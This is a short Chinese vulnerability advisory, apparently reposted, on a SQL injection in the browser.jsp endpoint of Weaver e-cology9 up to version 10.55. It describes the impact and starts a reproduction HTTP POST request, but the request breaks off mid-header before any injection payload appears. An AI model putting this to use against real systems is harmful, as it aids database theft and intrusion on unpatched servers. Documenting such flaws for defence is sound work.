泛微e-cology9 browser.jsp SQL注入漏洞
漏洞描述(介绍、成因)
泛微e-cology9中存在SQL注入漏洞,经身份认证的远程攻击者即可利用此漏洞获取数据库敏感信息,进一步利用可能导致目标系统被控。
漏洞危害
恶意攻击者可能会利用SQL注入漏洞获取、篡改数据库数据,执行系统命令,甚至获取系统控制权限。
适用场景
泛微e-cology9 <= 10.55
漏洞复现过程(有条件的自行搭建环境)
1、构建数据包
POST /mobile/plugin/browser.jsp HTTP/1.1
Host: xxx
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Linux; Android 5.1.1; SM-N976N Build/QP1A.190711.020; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/74.0.3729.136 Mobile Safari/537.36 E-Mobile7/7.0.41.20201208 Language/zh Qiyuesuo/physicalSDK
Content-Type: application/x-www-form-urlencoded
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7
Cookie: xxx
Connection: close
Cont
版权归原作者 Myu_ww 所有, 如有侵权,请联系我们删除。